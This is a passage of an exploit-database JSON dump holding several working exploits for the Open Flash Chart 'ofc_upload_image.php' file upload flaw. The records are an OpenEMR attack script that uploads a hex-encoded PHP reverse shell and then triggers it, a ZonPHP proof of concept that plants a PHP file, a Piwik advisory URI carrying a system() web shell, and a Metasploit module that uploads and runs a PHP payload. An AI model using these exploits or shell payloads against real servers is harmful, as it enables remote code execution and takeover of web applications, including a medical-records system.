\"6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a\".\r\n \"6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e\".\r\n \"707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028\".\r\n 
\"24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269\".\r\n \"7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928\".\r\n \"2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072\".\r\n \"696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428\".\r\n \"2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920\".\r\n \"7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f\".\r\n \"636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c\".\r\n \"2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444\".\r\n \"455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c\".\r\n \"20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253\".\r\n \"54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574\".\r\n \"293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d\".\r\n \"293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b\".\r\n \"325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20\".\r\n \"7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070\".\r\n \"72696e74202224737472696e675c6e223b7d7d0d0a3f3e\"); //PHP Reverse Shell, PTMNKY.\r\n\r\n\r\necho \"\\n> Writing reverse shell file\";\r\n\r\n$pckt = \"POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\\r\\n\";\r\n$pckt .= \"Host: {$host}\\r\\n\";\r\n$pckt .= \"Content-Length: \".strlen($pl).\"\\r\\n\\r\\n{$pl}\";\r\n\r\nfputs($sock, $pckt);\r\n\r\nsleep (2);\r\nprint \" ....\"; echo $go.\"[OK]\"; echo $no;\r\n\r\necho \"\\n> Calling your listener\";\r\n\r\n$pckt = \"GET /openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\\r\\n\";\r\n$pckt .= \"Host: {$host}\\r\\n\";\r\n$pckt .= \"Connection: 
Keep-Alive\\r\\n\\r\\n\";\r\n\r\nfputs($sock, $pckt);\r\n\r\nsleep (2);\r\nprint \" .........\"; echo $go.\"[OK]\"; echo $no.\"\\n\";\r\n\r\n// interact_sh();\r\necho \"\\n> Enjoy!\\n\\n\";\r\n\r\n?>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24492/"}, {"lastseen": "2016-02-03T09:35:30", "bulletinFamily": "exploit", "description": "ZonPHP 2.25 - Remote Code Execution (RCE) Vulnerability. CVE-2009-4140,CVE-2011-4275. Webapps exploit for php platform", "modified": "2013-10-20T00:00:00", "published": "2013-10-20T00:00:00", "id": "EDB-ID:29091", "href": "https://www.exploit-db.com/exploits/29091/", "type": "exploitdb", "title": "ZonPHP 2.25 - Remote Code Execution RCE Vulnerability", "sourceData": "# Exploit Title: ZonPHP V2.25 RCE Vulnerability\r\n# Google Dork: intext:\"Made by SLAPER\"\r\n# Date: 21-10-2013\r\n# Exploit Author: Halim Cruzito\r\n# Vendor Homepage: http://www.slaper.be\r\n# Software Link: http://www.slaper.be/zonPHPv225.zip\r\n# Version: v2.25\r\n# Tested on: Windows 7\r\n\r\n# PoC:\r\n\r\n<?php\r\n\r\n$url = \"http://server/\";\r\n$path = \"ofc/ofc_upload_image.php?name=\";\r\n$filename = \"up.php\";\r\n$data = \"<?php phpinfo(); ?>\";\r\n$headers = array(\"User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\",\ufffd\r\n\"Content-Type: text/plain\");\r\n\r\n\r\n$rc = curl_init();\r\ncurl_setopt($rc, CURLOPT_URL, $url.$path.$filename);\r\ncurl_setopt($rc, CURLOPT_HTTPHEADER, $headers);\r\ncurl_setopt($rc, CURLOPT_POST, 1);\r\ncurl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);\r\ncurl_setopt($rc, CURLOPT_POSTFIELDS, $data);\r\ncurl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);\r\n$ex = curl_exec($rc);\r\ncurl_close($rc);\ufffd\r\n\r\n$shelllink = ''.$url.''.$filename.'';\r\necho '<a href=\"'.$shelllink.'\" target=\"blank\">Exploited Click 
Here!</a>';\r\n\r\n?>\r\n\r\n\r\n\ufffd===============================================\r\n|Loveto:Karoxx Puyoo ^^ and all Malaysian HaXor |\r\n\ufffd===============================================", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29091/"}, {"lastseen": "2016-02-01T12:41:17", "bulletinFamily": "exploit", "description": "Piwik Open Flash Chart Remote Code Execution Vulnerability. CVE-2009-4140,CVE-2011-4275. Webapps exploit for php platform", "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "id": "EDB-ID:10532", "href": "https://www.exploit-db.com/exploits/10532/", "type": "exploitdb", "title": "Piwik Open Flash Chart Remote Code Execution Vulnerability", "sourceData": "Bugtraq ID: \t 37314\r\nClass: \tInput Validation Error\r\nCVE: \t\r\nRemote: \tYes\r\nLocal: \tNo\r\nPublished: \tDec 14 2009 12:00AM\r\nUpdated: \tDec 17 2009 06:03PM\r\nCredit: \tBraeden Thomas\r\nVulnerable: \tPiwik Piwik 0.4.3\r\nPiwik Piwik 0.4.2\r\nPiwik Piwik 0.4.1\r\nPiwik Piwik 0.4\r\nPiwik Piwik 0.2.37\r\nPiwik Piwik 0.2.36\r\nPiwik Piwik 0.2.35\r\nOpen Web Analytics Open Web Analytics 1.2.0\r\nOpen Flash Chart Open Flash Chart 2.0\r\n\r\n\r\nOpen Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.\r\n\r\nAttackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.\r\n\r\nOpen Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also be affected. 
\r\n\r\nThe following example URI is available:\r\n\r\nhttp://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?> ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10532/"}, {"lastseen": "2016-02-03T09:49:37", "bulletinFamily": "exploit", "description": "Open Flash Chart 2 - Arbitrary File Upload. CVE-2009-4140,CVE-2011-4275. Remote exploit for php platform", "modified": "2013-10-26T00:00:00", "published": "2013-10-26T00:00:00", "id": "EDB-ID:29210", "href": "https://www.exploit-db.com/exploits/29210/", "type": "exploitdb", "title": "Open Flash Chart 2 - Arbitrary File Upload", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Open Flash Chart v2 Arbitrary File Upload\",\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability found in Open Flash\r\n Chart version 2. 
Attackers can abuse the 'ofc_upload_image.php' file\r\n in order to upload and execute malicious PHP files.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Braeden Thomas', # Initial discovery + Piwik PoC\r\n 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # OpenEMR PoC\r\n 'Halim Cruzito', # zonPHP PoC\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['BID', '37314'],\r\n ['CVE', '2009-4140'],\r\n ['OSVDB', '59051'],\r\n ['EDB', '10532']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 8190, # Just a big value, injection on HTTP POST\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on:\r\n # * open-flash-chart v2-Lug-Wyrm-Charmer\r\n # set TARGETURI /php-ofc-library/\r\n # * open-flash-chart v2-beta-1\r\n # set TARGETURI /php-ofc-library/\r\n # * zonPHP v2.25\r\n # set TARGETURI /zonPHPv225/ofc/\r\n # * Piwik v0.4.3\r\n # set TARGETURI /piwik/libs/open-flash-chart/php-ofc-library/\r\n # * OpenEMR v4.1.1\r\n # set TARGETURI /openemr-4.1.1/library/openflashchart/php-ofc-library/\r\n [ 'Generic (PHP Payload)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 14 2009',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Open Flash Chart', '/php-ofc-library/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Check for ofc_upload_image.php\r\n #\r\n def check\r\n print_status(\"#{peer} - Sending check\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"ofc_upload_image.php\"),\r\n })\r\n if not res\r\n print_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n print_error(\"#{peer} - No ofc_upload_image.php found\")\r\n elsif res and res.code == 200 and res.body =~ /Saving your image to/\r\n vprint_status(\"#{peer} - Found 
ofc_upload_image.php\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n\r\n # Upload\r\n @fname = \"#{rand_text_alphanumeric(rand(10)+6)}.php\"\r\n print_status(\"#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...\")\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'),\r\n 'ctype' => \"\",\r\n 'vars_get' => { 'name' => \"#{@fname}\" },\r\n 'data' => \"<?php #{payload.encoded} ?>\"\r\n })\r\n if not res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No ofc_upload_image.php found\")\r\n elsif res.body =~ /can't write file/\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write '#{@fname}'\")\r\n elsif res.body =~ /Saving your image to: (.+)#{@fname}/\r\n path = $1\r\n register_files_for_cleanup(@fname)\r\n print_status(\"#{peer} - Executing '#{path}#{@fname}'\")\r\n else\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File wasn't uploaded, aborting!\")\r\n end\r\n\r\n # Execute\r\n res = send_request_raw({\r\n 'uri' => normalize_uri(target_uri.path, path, @fname)\r\n })\r\n if res and res.code == 404\r\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{@fname}\")\r\n end\r\n\r\n end\r\nend\r\n\r\n#\r\n# Source\r\n#\r\n=begin ofc_upload_image.php\r\n20-// default path for the image to be stored //\r\n21-$default_path = '../tmp-upload-images/';\r\n\r\n23-if (!file_exists($default_path)) mkdir($default_path, 0777, true);\r\n\r\n25-// full path to the saved image including filename //\r\n26-$destination = $default_path . basename( $_GET[ 'name' ] );\r\n\r\n28-echo 'Saving your image to: '. 
$destination;\r\n\r\n39-$jfh = fopen($destination, 'w') or die(\"can't open file\");\r\n40-fwrite($jfh, $HTTP_RAW_POST_DATA);\r\n41-fclose($jfh);\r\n=end", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29210/"}]}